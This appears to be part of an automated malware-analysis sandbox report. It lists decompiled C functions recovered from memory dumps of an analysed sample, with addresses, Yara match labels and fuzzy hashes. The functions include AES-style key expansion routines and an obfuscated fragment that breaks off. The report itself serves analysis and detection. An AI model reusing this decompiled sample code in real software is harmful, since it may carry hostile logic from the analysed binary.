				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                          0x00402d93
                                          0x00402d98
                                          0x00402da0
                                          0x00402da9
                                          0x00402db3
                                          0x00402dba
                                          0x00402dc3
                                          0x00402dce
                                          0x00402dd6
                                          0x00402ddf
                                          0x00402dea
                                          0x00402df0
                                          0x00402df5
                                          0x00402dfe
                                          0x00402e09
                                          0x00402e11
                                          0x00402e1a
                                          0x00402e25
                                          0x00402e2d
                                          0x00402e36
                                          0x00402e41
                                          0x00402e49
                                          0x00402e52
                                          0x00402e5d
                                          0x00402e65
                                          0x00402e6e
                                          0x00402e80
                                          0x00402e83
                                          0x00402f9f
                                          0x00402fa4
                                          0x00402e89
                                          0x00402e89
                                          0x00402e8c
                                          0x00402e8e
                                          0x00402e91
                                          0x00402e91
                                          0x00402ef6
                                          0x00402efb
                                          0x00402efd
                                          0x00402f03
                                          0x00402f05
                                          0x00402f0b
                                          0x00402f0d
                                          0x00402f10
                                          0x00402f16
                                          0x00000000
                                          0x00000000
                                          0x00402f72
                                          0x00402f78
                                          0x00402f7a
                                          0x00402f80
                                          0x00402f82
                                          0x00402f87
                                          0x00402f88
                                          0x00402f8b
                                          0x00402f8e
                                          0x00402f91
                                          0x00402f97
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402f97
                                          0x00402fae
                                          0x00402fae
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                          • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                          • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                          • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033A52A5, Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E033A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E033BEEF0(0x34979a0);
					_t104 =  *0x3498210; // 0x2f42e68
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E033BEB70(_t93, 0x34979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E033E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E033BEEF0(0x34979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E033BEB70(0, 0x34979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x2f42e75
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E033DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E033BEEF0(0x34979a0);
									__eflags =  *0x3498210 - _t104; // 0x2f42e68
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3498210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03424888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E033BEB70(_t95, 0x34979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E033E95D0();
											L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E033E95D0();
											L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E033BEB70(_t93, 0x34979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E033E95D0();
										L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E033E95D0();
										L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E033DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                          0x033a52a5
                                          0x033a52ad
                                          0x033a52b0
                                          0x033a52b3
                                          0x033a52b7
                                          0x033a52ba
                                          0x033a52bf
                                          0x033a52c4
                                          0x033a52cc
                                          0x00000000
                                          0x00000000
                                          0x033a52ce
                                          0x033a52d9
                                          0x033a52dd
                                          0x033a52e7
                                          0x033a52f7
                                          0x033a52f9
                                          0x033a52fd
                                          0x03400dcf
                                          0x03400dd5
                                          0x03400dd6
                                          0x03400dd7
                                          0x03400dd8
                                          0x03400dd9
                                          0x03400dde
                                          0x03400ddf
                                          0x03400de0
                                          0x03400de1
                                          0x03400de2
                                          0x03400de5
                                          0x03400dea
                                          0x03400dec
                                          0x03400f60
                                          0x03400f64
                                          0x03400f70
                                          0x03400f76
                                          0x03400f79
                                          0x03400f79
                                          0x00000000
                                          0x03400f64
                                          0x03400df2
                                          0x03400df7
                                          0x03400e04
                                          0x03400e0d
                                          0x03400e0d
                                          0x03400e10
                                          0x03400e1a
                                          0x03400e1c
                                          0x03400e4c
                                          0x03400e52
                                          0x03400e61
                                          0x03400e67
                                          0x03400e6b
                                          0x03400e70
                                          0x03400e76
                                          0x03400ed7
                                          0x03400edc
                                          0x03400ee0
                                          0x03400ee6
                                          0x03400eea
                                          0x03400eed
                                          0x03400ef0
                                          0x03400ef3
                                          0x03400ef6
                                          0x03400ef9
                                          0x03400efe
                                          0x03400f01
                                          0x03400f01
                                          0x03400f0b
                                          0x03400f12
                                          0x03400f16
                                          0x03400f18
                                          0x03400f1b
                                          0x03400f2c
                                          0x03400f31
                                          0x03400f31
                                          0x03400f35
                                          0x03400f39
                                          0x03400f3a
                                          0x03400f3c
                                          0x03400f3f
                                          0x03400f50
                                          0x03400f55
                                          0x03400f55
                                          0x03400f59
                                          0x033a52eb
                                          0x033a52f1
                                          0x033a52f1
                                          0x03400e7d
                                          0x03400e84
                                          0x03400e88
                                          0x03400e8a
                                          0x03400e8d
                                          0x03400e9e
                                          0x03400ea3
                                          0x03400ea3
                                          0x03400ea7
                                          0x03400eaf
                                          0x03400eb3
                                          0x03400eb9
                                          0x03400eb9
                                          0x03400ebc
                                          0x03400ecd
                                          0x03400ecd
                                          0x00000000
                                          0x03400eb3
                                          0x03400e21
                                          0x03400e2b
                                          0x03400e2f
                                          0x03400e30
                                          0x03400e3a
                                          0x03400e3f
                                          0x03400e41
                                          0x00000000
                                          0x00000000
                                          0x03400e47
                                          0x00000000
                                          0x03400e47
                                          0x03400df9
                                          0x03400dfe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03400dfe
                                          0x033a5303
                                          0x033a5307
                                          0x00000000
                                          0x033a5309
                                          0x00000000
                                          0x033a5309
                                          0x033a5307
                                          0x033a52e9
                                          0x033a52e9
                                          0x00000000
                                          0x033a52e9
                                          0x033a530e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8bffb8bd28f2c35f35902d0e566fa4c3d2bfdcafb4de2a90e2436bc7d991f7e
                                          • Instruction ID: 10e433ed0874899f160eacd839d87c07a463d332ab7bbcc2e9b754cbccd4d35f
                                          • Opcode Fuzzy Hash: d8bffb8bd28f2c35f35902d0e566fa4c3d2bfdcafb4de2a90e2436bc7d991f7e
                                          • Instruction Fuzzy Hash: B551DF756457419FE721EF68C880B67BBE8FF44710F14092EE8A58BA91E774E800CB96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402D89, Relevance: .2, Instructions: 161COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E00402D89(void* __ecx, void* __esi, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t68;
				signed int* _t73;
				signed int* _t87;
				signed int _t100;
				signed int _t102;
				signed int _t112;
				signed int _t114;
				signed int* _t116;
				signed int _t133;
				signed int _t135;
				signed int _t139;
				signed int _t160;
				intOrPtr _t182;

				asm("cli");
				asm("aad 0x5d");
				 *((intOrPtr*)(__esi - 0x74aae9c7)) =  *((intOrPtr*)(__esi - 0x74aae9c7)) - __ecx;
				_t87 = _a12;
				_t116 = _a8;
				_push(__esi);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t116 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
				_t68 =  &(_t116[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t116[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t68 | 0xffffffff;
				} else {
					_t182 = _a4;
					_t73 = 0;
					_a12 = 0;
					while(1) {
						_t160 =  *(_t68 + 0x18);
						_t100 = ( *(_t182 + 4 + (_t160 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t182 +  &(_t73[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t182 + 4 + (_t160 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 5 + (_t160 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t182 + 4 + (_t160 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t68 - 4);
						_t133 =  *_t68 ^ _t100;
						 *(_t68 + 0x1c) = _t100;
						_t102 =  *(_t68 + 4) ^ _t133;
						 *(_t68 + 0x20) = _t133;
						_t135 =  *(_t68 + 8) ^ _t102;
						 *(_t68 + 0x24) = _t102;
						 *(_t68 + 0x28) = _t135;
						if(_t73 == 6) {
							break;
						}
						_t112 = ( *(_t182 + 4 + (_t135 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t182 + 4 + (_t135 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 4 + (_t135 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t182 + 5 + (_t135 & 0x000000ff) * 4) & 0x000000ff ^  *(_t68 + 0xc);
						_t139 =  *(_t68 + 0x10) ^ _t112;
						 *(_t68 + 0x2c) = _t112;
						_t114 =  *(_t68 + 0x14) ^ _t139;
						 *(_t68 + 0x34) = _t114;
						_t73 =  &(_a12[0]);
						 *(_t68 + 0x30) = _t139;
						 *(_t68 + 0x38) = _t114 ^ _t160;
						_t68 = _t68 + 0x20;
						_a12 = _t73;
						if(_t73 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}
















                                          0x00402d89
                                          0x00402d8a
                                          0x00402d8c
                                          0x00402d93
                                          0x00402d98
                                          0x00402d9c
                                          0x00402da0
                                          0x00402da9
                                          0x00402db3
                                          0x00402dba
                                          0x00402dc3
                                          0x00402dce
                                          0x00402dd6
                                          0x00402ddf
                                          0x00402dea
                                          0x00402df0
                                          0x00402df5
                                          0x00402dfe
                                          0x00402e09
                                          0x00402e11
                                          0x00402e1a
                                          0x00402e25
                                          0x00402e2d
                                          0x00402e36
                                          0x00402e41
                                          0x00402e49
                                          0x00402e52
                                          0x00402e5d
                                          0x00402e65
                                          0x00402e6e
                                          0x00402e80
                                          0x00402e83
                                          0x00402f9d
                                          0x00402fa4
                                          0x00402e89
                                          0x00402e89
                                          0x00402e8c
                                          0x00402e8e
                                          0x00402e91
                                          0x00402e91
                                          0x00402ef6
                                          0x00402efb
                                          0x00402efd
                                          0x00402f03
                                          0x00402f05
                                          0x00402f0b
                                          0x00402f0d
                                          0x00402f10
                                          0x00402f16
                                          0x00000000
                                          0x00000000
                                          0x00402f72
                                          0x00402f78
                                          0x00402f7a
                                          0x00402f80
                                          0x00402f82
                                          0x00402f87
                                          0x00402f88
                                          0x00402f8b
                                          0x00402f8e
                                          0x00402f91
                                          0x00402f97
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402f97
                                          0x00402fae
                                          0x00402fae
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68b377683f1efa63f82459cdc7a7b76599852c8f47517eaf9c54201e03de88af
                                          • Instruction ID: 7b80f929b339595f6e3d4b74bbf43558f07ce378f8118fbd63617813f3cbb76c
                                          • Opcode Fuzzy Hash: 68b377683f1efa63f82459cdc7a7b76599852c8f47517eaf9c54201e03de88af
                                          • Instruction Fuzzy Hash: 245184B3E14A214BD318CF19CC40631B792FFD8312B5F81BEDD199B397CA74A9529A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D2AE4, Relevance: .2, Instructions: 159COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3498204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3498208; // 0x3498207
				_t8 = _t57 + 0x3498208; // 0x3498207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3498450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x349821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3496d5c; // 0x7f960654
							_t72 =  *0x3496d5c; // 0x7f960654
							_t75 =  *0x3496d5c; // 0x7f960654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3496d5c; // 0x7f960654
							_t84 =  *0x3496d5c; // 0x7f960654
							_t87 =  *0x3496d5c; // 0x7f960654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E033EF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                          0x033d2ae4
                                          0x033d2aec
                                          0x033d2aef
                                          0x033d2af4
                                          0x033d2af7
                                          0x033d2afd
                                          0x033d2b92
                                          0x033d2b92
                                          0x033d2b97
                                          0x033d2b9c
                                          0x033d2b9c
                                          0x033d2b03
                                          0x033d2b06
                                          0x033d2b09
                                          0x033d2b09
                                          0x033d2b0f
                                          0x033d2b15
                                          0x033d2b15
                                          0x033d2b1b
                                          0x033d2b1e
                                          0x033d2b21
                                          0x033d2b26
                                          0x033d2b29
                                          0x033d2b81
                                          0x033d2b84
                                          0x033d2c0e
                                          0x033d2c15
                                          0x033d2c24
                                          0x033d2c24
                                          0x033d2b8a
                                          0x033d2b8a
                                          0x033d2b8a
                                          0x033d2b8a
                                          0x033d2b90
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033d2b4a
                                          0x033d2b4a
                                          0x033d2b4d
                                          0x033d2b53
                                          0x00000000
                                          0x00000000
                                          0x033d2b55
                                          0x033d2b58
                                          0x033d2bb7
                                          0x03415d1b
                                          0x03415d37
                                          0x03415d47
                                          0x03415d53
                                          0x033d2bbd
                                          0x033d2bbd
                                          0x033d2bbd
                                          0x033d2bb7
                                          0x033d2b5d
                                          0x033d2c2f
                                          0x03415d5b
                                          0x03415d77
                                          0x03415d87
                                          0x03415d93
                                          0x033d2c35
                                          0x033d2c35
                                          0x033d2c35
                                          0x033d2c2f
                                          0x033d2b65
                                          0x033d2b9f
                                          0x033d2ba2
                                          0x033d2b67
                                          0x033d2b67
                                          0x033d2b69
                                          0x033d2b6b
                                          0x033d2b6e
                                          0x033d2bc9
                                          0x033d2bcc
                                          0x033d2bcf
                                          0x033d2bd4
                                          0x033d2bd6
                                          0x033d2bd6
                                          0x033d2bdb
                                          0x033d2c02
                                          0x033d2c05
                                          0x033d2c07
                                          0x00000000
                                          0x033d2c07
                                          0x033d2be0
                                          0x033d2c00
                                          0x033d2c3f
                                          0x033d2c3f
                                          0x00000000
                                          0x033d2c00
                                          0x033d2be5
                                          0x033d2be7
                                          0x033d2bec
                                          0x033d2bf4
                                          0x033d2bf6
                                          0x00000000
                                          0x033d2bf6
                                          0x033d2b70
                                          0x033d2b76
                                          0x033d2b2b
                                          0x033d2b2b
                                          0x033d2b2d
                                          0x033d2b2f
                                          0x033d2b32
                                          0x033d2b35
                                          0x033d2b3a
                                          0x00000000
                                          0x033d2b40
                                          0x033d2b43
                                          0x033d2b45
                                          0x033d2b47
                                          0x033d2b4a
                                          0x033d2b4d
                                          0x033d2b53
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033d2b53
                                          0x033d2b78
                                          0x033d2b78
                                          0x033d2b7b
                                          0x033d2b7e
                                          0x00000000
                                          0x033d2b7e
                                          0x033d2b76
                                          0x033d2ba5
                                          0x033d2ba5
                                          0x033d2ba8
                                          0x033d2bad
                                          0x00000000
                                          0x00000000
                                          0x033d2baf
                                          0x033d2baf
                                          0x033d2bc2
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6865a6c9fddd745987b745e4d24dfd8a768ae583791b04e3d08b9f1a7096fc6
                                          • Instruction ID: 880b6bea86aa84888b9e7491c6051f61ba3c9b6c3875eefc1cb4705b0bdbfbb8
                                          • Opcode Fuzzy Hash: e6865a6c9fddd745987b745e4d24dfd8a768ae583791b04e3d08b9f1a7096fc6
                                          • Instruction Fuzzy Hash: EA51CF7BA001158FCB14DF1CD8C09BEB7B5FB8870070A895AE856EF314D774AA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041DA23, Relevance: .2, Instructions: 154COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 27%
                                          			E0041DA23(signed char __ebx, intOrPtr __edx, signed int __edi, signed int __esi) {
				void* _t23;
				signed int _t24;
				signed char _t25;
				signed char _t26;
				signed char _t28;
				signed int _t48;
				signed int _t52;
				signed int _t53;
				signed int _t60;

				_t53 = __esi;
				_t48 = __edi;
				_t28 = __ebx;
				_push(__ebx);
				asm("sbb eax, [0xf37195cd]");
				asm("sbb ebp, [0x71a8483d]");
				asm("rol dword [0xa1a1f103], 0x96");
				_t61 = _t60 ^ 0xfd691bf4;
				 *0x3dbbbaf6 =  *0x3dbbbaf6 >> 0x1b;
				 *0xfa16c0bf = __edx;
				if( *0x3dbbbaf6 > 0) {
					goto L1;
					do {
						do {
							do {
								do {
									do {
